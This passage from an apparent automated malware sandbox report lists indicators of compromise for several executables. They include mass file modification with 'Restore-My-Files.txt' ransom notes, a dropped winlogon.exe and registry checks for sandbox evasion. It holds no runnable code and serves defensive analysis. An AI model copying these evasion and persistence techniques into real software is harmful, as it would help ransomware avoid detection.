description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssve.xml e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Inset.eftx e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwnumbered.dotx e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files (x86)\Common Files\System\wab32.dll-Locked 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sk-SK\tipresx.dll.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\ca.pak e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_F_COL.HXK e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\flavormap.properties e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\sv-SE\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrcommonlm.dat e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLIST.CHM e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\7-Zip\License.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\da-DK\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Drops file in Windows directory 49 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\sets.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\autofill_bypass_cache_forms.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\typosquatting_list.pb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_etld1_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_full_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\data.txt msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\typosquatting_list.pb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\well_known_domains.dll msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\protocols.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\LICENSE msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\v1FieldTypes.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\ct_config.pb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\edge_autofill_global_block_list.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\kp_pinslist.pb msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.fingerprint msedge.exe File opened for modification C:\Windows\winlogon.exe e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\safety_tips.pb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\keys.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\crs.pb msedge.exe File created C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\LICENSE msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.json msedge.exe File created C:\Windows\winlogon.exe e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Windows\assembly d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe File opened for modification C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\regex_patterns.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.fingerprint msedge.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp1.jpg Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried 